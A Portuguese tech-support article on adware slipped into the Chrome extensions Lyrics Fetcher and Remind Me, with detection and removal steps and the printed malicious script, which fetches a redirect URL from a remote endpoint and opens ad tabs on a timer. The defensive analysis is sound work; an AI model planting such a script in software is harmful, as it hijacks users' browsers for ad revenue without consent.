Um adware que abre pop-ups para o Boredtravel.com caiu em algumas extensões do Chrome. Veja como detectar e remover esse vírus.
Identifique e remova o adware Boredtravel.com
Um script malicioso foi inserido na atualização mais recente de várias extensões do Chrome. Este script abre o site Boredtravel.com sem o conhecimento dos usuários, em intervalos regulares de tempo. As extensões infectadas por esse script são Lyrics Fetcher e Remind Me, do desenvolvedor webwebtech.
Este adware não é perigoso, pois apenas abre uma página de publicidade. No entanto, é perturbador deixar que essa prática dúbia ocorra.
Identifique o adware
Para identificar o adware, basta analisar o comportamento do seu navegador:
- Feche o Google Chrome e reinicie-o.
- Aguarde 6 minutos depois de abrir o navegador. Se o seu navegador estiver infectado, uma guia será aberta na página boredtravel.com após exatamente 6 minutos. Isso também acontece a cada 4 horas
Excluir adware
A remoção é simples e rápida:
- Verifique suas extensões do Chrome: se uma ou mais das extensões listadas acima estiverem instaladas, seu navegador provavelmente está infectado.
- Para remover este adware, basta desativar ou remover as extensões em questão.
Casos foram identificados para extensões Lyrics Fetcher e Lembrar-me, mas eles podem não ser os únicos. É possível que o adware também esteja presente na extensão Modo Bebê, uma extensão do mesmo desenvolvedor.
Não está claro se o desenvolvedor desta extensão adicionou deliberadamente o script mal-intencionado ou se foi feito por um hacker. Como precaução, recomendamos que você desative ou remova todas as extensões deste desenvolvedor.
As extensões foram relatadas ao Google, saberemos mais em breve. Se outras extensões tiverem a mesma preocupação, não hesite em nos informar.
Substituir extensões
Aqui estão algumas extensões alternativas:
- O Lyrics Fetcher pode ser substituído por Letras Here de Rob W ou Auto Lyric Show
- Lembre-me pode ser substituído por Lembrete de Pi
O trabalho de Boredtravel.com
O princípio é simples: o desenvolvedor ou um hacker adicionou um script nas extensões em questão. Esse script, executado em segundo plano, instrui o navegador a abrir uma página de publicidade em intervalos regulares. O objetivo para o desenvolvedor ou hacker é que a página de destino seja aberta várias vezes. Isso permite aumentar o número de visualizações do site Boredtravel.com e aumentar a receita relacionada.
Aqui está o código que foi adicionado na extensão. Adicionei comentários verdes para você entender melhor
<script>
// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
setTimeout(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
/* cette URL génère un lien du type
https://ourshort.com/?g/BNHzHJJ */
async: false,
dataType: 'json',
success: function (data) {
//ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
intervalWebsite() /* appel de la fonction qui ouvre
un pop-up toutes les 4 heures */
}
});
}, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min
// fonction qui ouvre un pop-up toutes les 4 heures
function intervalWebsite() {
setInterval(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
// comme dans la première fonction
async: false,
dataType: 'json',
success: function (data) {
// comme dans la première fonction
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
}
});
}, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
}
</script>
Fontes: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
Leia também: Habilite a autenticação dupla em suas contas online (2FA) https://currenttrends.fr/internet/2fa-double-authentification/
Eu tenho esse problema, mas não conheço nenhuma das extensões que você mencionou.